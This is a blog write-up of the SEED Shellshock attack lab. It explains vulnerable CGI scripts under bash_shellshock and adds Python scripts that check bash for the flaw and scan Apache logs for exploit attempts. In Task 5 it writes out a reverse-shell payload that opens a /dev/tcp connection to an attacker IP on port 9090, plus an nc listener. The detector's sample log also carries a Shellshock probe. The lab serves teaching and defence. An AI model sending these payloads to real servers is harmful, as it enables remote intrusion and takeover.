
Shellshock Attack Lab

2022-06-13 08:20:00 1ZAYAK1


Use Ubuntu 16.04. On 20.04 you can use Docker, or install Apache yourself, to do the later tasks.

Task1

Bash version: in the SEED Ubuntu 16.04 virtual machine provided with the book, there are two versions of the Bash program in the /bin directory. One is called bash; this version has been patched, so it is not affected by the Shellshock attack. The bash that runs in the terminal is this safe version, and the patch changes how functions are passed through the environment. The other version is called bash_shellshock, and it has not been patched. In this chapter's experiment you must use the vulnerable version, otherwise the attack will not succeed.
So we first have to prepare the vulnerable bash version.
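To tell which of the two binaries is the patched one, the usual check is to export an environment variable whose value looks like a function definition followed by a trailing command, run the bash under test, and see whether the trailing command executes. The script below is an added example, not part of the lab or the original post; the probe variable name and marker string are constructed for this check, and the default path /bin/bash is an assumption (pass /bin/bash_shellshock to test the unpatched copy).

```python
import os
import subprocess

# Constructed probe: a function definition followed by a trailing command.
# A patched bash ignores the trailing text; an unpatched bash runs it when
# it imports the function from the environment.
PROBE_VAR = "SHELLSHOCK_PROBE"          # constructed name, not special to bash
PROBE_MARKER = "SHELLSHOCK_MARKER"      # constructed marker string
PROBE_VALUE = "() { :; }; echo " + PROBE_MARKER


def is_shellshock_vulnerable(bash_path="/bin/bash"):
    """Return True if the bash at bash_path executes the trailing command of a
    function-shaped environment variable, False if it does not, and None if
    the binary cannot be run at all (missing, not executable, timeout)."""
    if not (os.path.isfile(bash_path) and os.access(bash_path, os.X_OK)):
        return None
    env = dict(os.environ)
    env[PROBE_VAR] = PROBE_VALUE
    try:
        proc = subprocess.run(
            [bash_path, "-c", "echo probe-done"],
            env=env, capture_output=True, text=True, timeout=10,
        )
    except (OSError, subprocess.SubprocessError):
        return None
    # The marker only appears if the trailing command ran during startup.
    return PROBE_MARKER in proc.stdout


def report(paths):
    """Map each path to 'vulnerable', 'patched' or 'not runnable'."""
    labels = {True: "vulnerable", False: "patched", None: "not runnable"}
    return {p: labels[is_shellshock_vulnerable(p)] for p in paths}


if __name__ == "__main__":
    for path, verdict in report(["/bin/bash", "/bin/bash_shellshock"]).items():
        print(f"{path}: {verdict}")
```

Run it inside the lab VM: the patched /bin/bash should report "patched" and /bin/bash_shellshock should report "vulnerable". The same function can be pointed at any bash binary you are responsible for, which is the check to run after applying the vendor patch.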

Task2

In this experiment we will launch a Shellshock attack on a remote web server.
Many web servers enable CGI, which is a standard way to generate dynamic content on web pages and in web applications. Many CGI programs are written as shell scripts. So before a CGI program runs, a shell program is invoked first, and this invocation is triggered by a user on a remote computer. If that shell is a vulnerable Bash program, we can use the Shellshock vulnerability to gain privileges on the server.
In this task we will build a very simple CGI program (called myprog.cgi), as shown below.

#!/bin/bash_shellshock
echo "Content-type: text/plain"
echo        # blank line ends the HTTP headers
echo
echo "Hello World"

It is just a shell script that prints "Hello World".
Place this CGI program in the /usr/lib/cgi-bin directory and set its permissions to 755 (so that it is executable).
Running the command-line program curl does the same thing:

$ curl http://localhost/cgi-bin/myprog.cgi

In our setup we run the web server and the attack from the same computer, which is why we use localhost. In a real attack the server runs on a remote computer, and the server's hostname or IP address would be used instead of localhost.
You can see that "Hello World" is printed.

Task3

To exploit the Shellshock vulnerability in a Bash-based CGI program, the attacker needs to pass data to the vulnerable Bash program, and that data must be passed through environment variables. In this task we need to understand how this happens.
The following CGI program demonstrates that you can send an arbitrary string to the CGI program, and the string will appear in one of its environment variables:

#!/bin/bash_shellshock
echo "Content-type: text/plain"
echo        # blank line ends the HTTP headers
echo "****** Environment Variables ******"
strings /proc/$$/environ   # dump this process's environment block

Put it in the same folder and chmod it as before.
Running it:
You can see that the environment variables are printed successfully. When the CGI program is invoked, the web server first forks a new process and then uses exec() to run the CGI program. Because the CGI program starts with a #! line naming bash (here /bin/bash_shellshock), it is a shell script, so bash is executed to run it. When the child process is created to run bash, the web server's environment variables are passed to the child, and therefore to bash. Some of these environment variables can be controlled by the client, who can put chosen strings into them, for example USER_AGENT and similar header-derived variables.

Task4

After setting up the above CGI program we can now launch the Shellshock attack. The attack does not depend on the contents of the CGI program, because its target is the Bash program, which is invoked before the CGI script itself runs. Our goal is to attack through the URL http://localhost/cgi-bin/myprog.cgi and achieve what a remote user should not be able to do.
By constructing an appropriate request we can read the database password.

Task5

The Shellshock vulnerability allows an attacker to run arbitrary commands on the target computer. In a real attack, attackers usually choose to run a shell rather than hard-coding commands into the attack, because as long as the shell process exists they can use it to run other commands. To achieve this the attacker needs to run a reverse shell. A reverse shell is a shell process started on the victim's computer whose input and output are controlled by someone on a remote computer. Basically, the shell runs on the victim's computer, but it takes its input from the attacker's computer and prints its output on the attacker's computer. A reverse shell lets an attacker easily run commands on a compromised computer.
Creating a reverse shell in the Shellshock attack: the attacker first runs the "nc -lv 9090" command to start a TCP server.
Then run the following command to send a malicious request to the CGI program on the target server.
Once the curl command is executed, the attack command is also executed on the server, which causes the CGI program to trigger a Bash shell. This Bash shell connects to port 9090 on 192.168.88.130 (the attacker's machine). The attacker's nc program accepts the connection and displays the prompt of the Bash shell triggered by the CGI program, which shows that the reverse shell succeeded. This can be confirmed with the id command, which prints that the user ID of the remote CGI process is www-data.
We use the -A option to set the User-Agent of the request, and then we build our command into it. Shellshock converts the environment variable into a shell variable of its own: if bash finds an environment variable whose value starts with a pair of parentheses, it converts it into a shell function. In this case USER_AGENT is converted into a shell function plus three shell commands, and those commands are executed. At this point we have achieved the desired result.
The attacker passes the USER_AGENT environment variable in through -A, and the environment variable is parsed by the vulnerable bash as follows:
USER_AGENT () { echo hello; }; echo Content_type: text/plain; echo; echo; /bin/bash -i > /dev/tcp/192.168.88.130/9090 0<&1 2>&1
This is equivalent to executing the following on the server:
/bin/bash -i > /dev/tcp/192.168.88.130/9090 0<&1 2>&1
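Because every request header is handed to the CGI's bash through the environment, the "() {" prefix that bash treats as a function definition is also what a defender looks for in the web server's logs. The script below is an added example, not part of the lab or the original post: it parses Apache combined-format access log lines, flags entries whose User-Agent, Referer or request string carries that prefix, and extracts the text that an unpatched bash would have run. The log lines are constructed samples; the field layout assumes Apache's default combined format.

```python
import re

# Apache "combined" log format; the User-Agent is the last quoted field.
COMBINED_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# An exported bash function definition begins with "() {"; whatever follows
# the closing "}" is the part an unpatched bash executed at startup.
FUNC_PREFIX_RE = re.compile(r"\(\s*\)\s*\{")

# Fields that come from client-controlled headers or the request line.
WATCHED_FIELDS = ("agent", "referer", "request")


def parse_combined(line):
    """Return a dict of the log fields, or None if the line does not parse."""
    m = COMBINED_RE.match(line)
    return m.groupdict() if m else None


def trailing_payload(value):
    """Text after the function body: what a vulnerable bash would run."""
    parts = re.split(r"\}\s*;?", value, maxsplit=1)
    return parts[1].strip() if len(parts) == 2 else ""


def find_shellshock_attempts(lines):
    """One finding per log line that carries a function-definition prefix in
    a client-controlled field."""
    findings = []
    for line in lines:
        rec = parse_combined(line)
        if rec is None:
            continue  # unparsable line; a real pipeline would count these
        hit_fields = [f for f in WATCHED_FIELDS if FUNC_PREFIX_RE.search(rec[f])]
        if hit_fields:
            findings.append({
                "host": rec["host"],
                "time": rec["time"],
                "request": rec["request"],
                "fields": hit_fields,
                "payload": trailing_payload(rec[hit_fields[0]]),
            })
    return findings


# Constructed sample log lines (not taken from the lab). The second one
# mimics a probe against the CGI script discussed above, with the page's
# own "id" command as the trailing part.
SAMPLE_LOG = [
    '10.0.0.5 - - [13/Jun/2022:08:20:00 +0000] "GET /cgi-bin/myprog.cgi HTTP/1.1" '
    '200 12 "-" "curl/7.47.0"',
    '10.0.0.9 - - [13/Jun/2022:08:21:13 +0000] "GET /cgi-bin/myprog.cgi HTTP/1.1" '
    '200 12 "-" "() { :; }; echo Content_type: text/plain; echo; echo; /usr/bin/id"',
    '10.0.0.7 - - [13/Jun/2022:08:22:40 +0000] "GET /index.html HTTP/1.1" '
    '200 512 "-" "Mozilla/5.0"',
]


if __name__ == "__main__":
    for hit in find_shellshock_attempts(SAMPLE_LOG):
        print(f"{hit['time']} {hit['host']} {hit['request']} "
              f"via {','.join(hit['fields'])}: {hit['payload']}")
```

Matching on the "() {" prefix rather than on specific commands catches the technique regardless of what the trailing part does; the extracted payload then tells the responder what was attempted against the host. Note that Apache only logs the User-Agent and Referer headers by default, so other headers that the CGI also exports (Cookie, custom headers) need a custom LogFormat or request-level inspection to be visible.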


Copyright notice
This article was written by [1ZAYAK1]; when reposting, please include the original link. Thank you.
https://yzsam.com/2022/02/202202270543540805.html